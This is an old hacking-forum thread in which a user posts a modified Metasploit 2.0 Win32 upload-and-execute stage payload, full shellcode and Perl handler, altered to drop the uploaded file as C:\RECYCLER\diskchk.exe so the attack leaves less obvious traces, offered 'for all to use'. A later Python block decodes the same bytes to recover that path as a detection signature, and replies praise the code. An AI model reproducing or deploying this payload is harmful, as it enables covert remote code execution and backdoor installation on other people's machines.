slynx
Okay.... ever since the release of Metasploit Framework 2.0 I've been coding all my exploits
in there, porting existing ones from C and Python, and using the included exploits to perform
penetration tests. I find the payload options in this Framework are far better than those of
CORE IMPACT or Immunity's CANVAS. However, after using the Win32 Upload/Exec
payload to successfully exploit an unpatched NT 4.0 box with MS03-026 and upload a Win32
Connectback Backdoor, I noticed that the file c:\metasploit.exe suddenly appears. After reading
through the ASM file for that payload I realized that the destination file on the remote
machine was hardcoded, and that was the file I was uploading. Well, I don't like this for two
reasons: one, it made me paranoid, thinking that some new Metasploit virus was now unleashed
on my network (aaaahhhhh!!! noooo!!!!), and two, it leaves blatant traces of the attack
(*cough* not that that matters....), so I took it upon myself to change that one little line in
Win32UploadExec.pm and remake the shellcode. So here is the newly updated and blackhat style
Win32UploadExec.pm for all to use. Just replace the old Win32UploadExec.pm in \lib\Msf\PayloadComponent
with this one.

Enjoy :>

CODE

package Msf::PayloadComponent::Win32UploadExecStage;
use strict;
use base 'Msf::PayloadComponent::Win32StagePayload';

# Module info: one user option (the local file to push), plus the stage
# shellcode the framework sends once the first-stage connection is up.
my $info = {
 'UserOpts' =>
   {
     'PEXEC' =>  [1, 'PATH', 'Full path to file to upload and execute'],
   },
 'Win32StagePayload' =>
   {
     # Modified Payload : Temporary File Changed to C:\RECYCLER\diskchk.exe
     # Modified By      : slynx < sk0rch3r [at] hotmail.com >
     # EXITFUNC: the framework patches the dword at byte 264 (a push imm32
     # operand) with the hash of the chosen exit function.
     Offsets => { EXITFUNC => [264, 'V'] },
     # The drop path lives inline in the stage as a NUL-terminated string
     # (the bytes after the "call" at offset 57 below).
     Payload =>
"\xff\x75\x00\x68\xa5\x17\x00\x7c\xff\x55\x04\x89\x45\x64\xff\x75".
"\x00\x68\x1f\x79\x0a\xe8\xff\x55\x04\x89\x45\x68\xff\x75\x00\x68".
"\xfb\x97\xfd\x0f\xff\x55\x04\x89\x45\x6c\x8d\x45\x78\x6a\x00\x6a".
"\x04\x50\x57\xff\x55\x18\x8b\x45\x78\xe8\x18\x00\x00\x00\x43\x3a".
"\x5c\x52\x45\x43\x59\x43\x4c\x45\x52\x5c\x64\x69\x73\x6b\x63\x68".
"\x6b\x2e\x65\x78\x65\x00\x59\x89\x4d\x70\x6a\x00\x6a\x06\x6a\x04".
"\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\x51\xff\x55\x64\x89\xc3\x81".
"\xec\x58\xff\xff\xff\x89\x65\x74\x8b\x45\x74\x6a\x00\x6a\x20\x50".
"\x57\xff\x55\x18\x8b\x4d\x78\x29\xc1\x89\x4d\x78\x54\x89\xe1\x6a".
"\x00\x51\x50\xff\x75\x74\x53\xff\x55\x68\x59\x8b\x45\x78\x85\xc0".
"\x75\xd6\x53\xff\x55\x6c\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a\x15".
"\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7\x44".
"\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24\x50".
"\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75".
"\x70\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89".
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff".
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31".
"\xdb\x53\xff\xd0"
 }
};

sub new {
 my $class = shift;
 my $hash = @_ ? shift : { };
 $hash = $class->MergeHash($hash, {'Info' => $info});
 my $self = $class->SUPER::new($hash, @_);
 return($self);
}

# Runs once the stage has connected back: slurp the local file and send it
# as a 4-byte little-endian length followed by the raw bytes, which is the
# framing the stage expects before it writes the file and executes it.
sub HandleConnection {
 my $self = shift;
 $self->SUPER::HandleConnection;
 my $sock = $self->SocketOut;
 my $blocking = $sock->blocking;

 if(!open(INFILE, '<' . $self->GetVar('PEXEC'))) {
   $self->PrintLine('[*] Could not open path to upload/exec.');
   $self->KillChild;
   return;
 }

 # Read the executable as raw bytes (no CRLF translation), all at once.
 binmode(INFILE);
 local $/;
 my $upload = <INFILE>;
 close(INFILE);

 $sock->blocking(1);

 $self->PrintLine('[*] Sleeping before sending file.');
 sleep(2);

 $self->PrintLine('[*] Uploading file (' . length($upload) . '), Please wait...');
 # 'V' = unsigned 32-bit little-endian, matching the stage's 4-byte read.
 $sock->send(pack('V', length($upload)));
 $sock->send($upload);
 $self->PrintLine('[*] Executing uploaded file...');

 $sock->blocking($blocking);
}

1;


(I apologize for the wordiness of this and all my other posts ;p)

UPDATE: oops... left that extra ';' in there that fux0red loading into metasploit ;p
Maybe I should start drafting my posts before clicking 'submit' :>
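The point of the post is that the drop path is baked into the stage bytes, so it is also the artifact an investigator can recover from a captured payload. The following Python is an added example (not slynx's code and not part of the Metasploit Framework): it decodes the Perl "\xNN" string from the post, locates the "call over an inline string" construct that carries the path, reads the dword that the EXITFUNC offset points at, and builds/parses the length-prefixed upload frame the Perl handler above sends. The function names and the scanner's heuristics (a rel32 under 256 bytes followed by printable ASCII and a NUL) are my own assumptions, not framework APIs.

```python
import re
import struct

# The Payload value exactly as posted in the thread (Perl "\xNN" escapes).
PERL_PAYLOAD = r'''
"\xff\x75\x00\x68\xa5\x17\x00\x7c\xff\x55\x04\x89\x45\x64\xff\x75".
"\x00\x68\x1f\x79\x0a\xe8\xff\x55\x04\x89\x45\x68\xff\x75\x00\x68".
"\xfb\x97\xfd\x0f\xff\x55\x04\x89\x45\x6c\x8d\x45\x78\x6a\x00\x6a".
"\x04\x50\x57\xff\x55\x18\x8b\x45\x78\xe8\x18\x00\x00\x00\x43\x3a".
"\x5c\x52\x45\x43\x59\x43\x4c\x45\x52\x5c\x64\x69\x73\x6b\x63\x68".
"\x6b\x2e\x65\x78\x65\x00\x59\x89\x4d\x70\x6a\x00\x6a\x06\x6a\x04".
"\x6a\x00\x6a\x07\x68\x00\x00\x00\xe0\x51\xff\x55\x64\x89\xc3\x81".
"\xec\x58\xff\xff\xff\x89\x65\x74\x8b\x45\x74\x6a\x00\x6a\x20\x50".
"\x57\xff\x55\x18\x8b\x4d\x78\x29\xc1\x89\x4d\x78\x54\x89\xe1\x6a".
"\x00\x51\x50\xff\x75\x74\x53\xff\x55\x68\x59\x8b\x45\x78\x85\xc0".
"\x75\xd6\x53\xff\x55\x6c\x87\xfa\x31\xc0\x8d\x7c\x24\xac\x6a\x15".
"\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44\x66\xc7\x44".
"\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89\x7c\x24\x50".
"\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51\x51\xff\x75".
"\x70\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0\x89".
"\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a\xff".
"\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55\x04\x31".
"\xdb\x53\xff\xd0"
'''


def perl_hex_to_bytes(perl_src: str) -> bytes:
    """Decode a Perl string literal built from \\xNN escapes into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', perl_src))


def find_call_over_strings(code: bytes, max_len: int = 256):
    """Heuristic (assumption): E8 <rel32> whose displacement skips a short run of
    printable ASCII ending in NUL is a 'call over inline string' that leaves the
    string's address on the stack.  Returns [(offset_of_call, string), ...]."""
    hits = []
    for i in range(len(code) - 5):
        if code[i] != 0xE8:
            continue
        disp = struct.unpack_from('<I', code, i + 1)[0]
        if not 2 <= disp <= max_len or i + 5 + disp > len(code):
            continue
        blob = code[i + 5:i + 5 + disp]
        if blob[-1] == 0 and all(0x20 <= b < 0x7F for b in blob[:-1]):
            hits.append((i, blob[:-1].decode('ascii')))
    return hits


def exitfunc_dword(code: bytes, offset: int = 264) -> int:
    """Read the dword at the module's EXITFUNC offset ('V' = little-endian u32).
    Sanity check: it must be the operand of a push imm32 (0x68) to be patchable."""
    if code[offset - 1] != 0x68:
        raise ValueError("EXITFUNC offset is not a push imm32 operand")
    return struct.unpack_from('<I', code, offset)[0]


def build_upload_frame(data: bytes) -> bytes:
    """Same framing as the Perl handler: pack('V', length) then the file bytes."""
    return struct.pack('<I', len(data)) + data


def parse_upload_frame(stream: bytes):
    """Inverse of build_upload_frame, as a sensor reassembling the stream would do.
    Returns (file_bytes, remaining); rejects a frame whose body is missing."""
    if len(stream) < 4:
        raise ValueError("no length header")
    (n,) = struct.unpack_from('<I', stream, 0)
    if len(stream) - 4 < n:
        raise ValueError(f"truncated: header says {n} bytes, {len(stream) - 4} present")
    return stream[4:4 + n], stream[4 + n:]


PAYLOAD = perl_hex_to_bytes(PERL_PAYLOAD)

if __name__ == '__main__':
    print("stage length:", len(PAYLOAD))
    print("inline strings:", find_call_over_strings(PAYLOAD))
    print("EXITFUNC dword: 0x%08x" % exitfunc_dword(PAYLOAD))
    # Constructed sample file body, not a real executable.
    frame = build_upload_frame(b"MZ\x90\x00" * 3)
    print("round trip:", parse_upload_frame(frame))
```

Running it against the posted bytes yields one inline string, C:\RECYCLER\diskchk.exe at the call at offset 57, which is the file-system artifact to hunt for; the same scanner works on other stage blobs, and the recovered string doubles as a byte pattern for a content signature. The EXITFUNC check confirms that byte 264 really sits inside a push imm32, so the Offsets entry in the module is consistent with the shellcode.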
n4than_69
Metasploit Framework is an excellent tool and could be a very powerful one,
of course against unpatched boxes.
I think it's more useful if used with Linux, at least that's what I experienced.
Tyrano
great work slynx
slynx
Most of the exploits included in the Metasploit Framework do target *nix, but that
doesn't make it any less useful against Windows systems. The real gold in the
Framework lies in the ability to quickly develop *new* exploits with on-the-fly
payload generation and in giving you a consolidated place to organize yourself for
a pen-test.....

My $0.02 ....
predx
Hey, thanks for the update. I must admit I haven't tested the original in Metaframe yet, but this will give me an excuse to. Thanks again.
ssj4conejo
thx, great coding = ).
Invision Power Board © 2001-2005 Invision Power Services, Inc.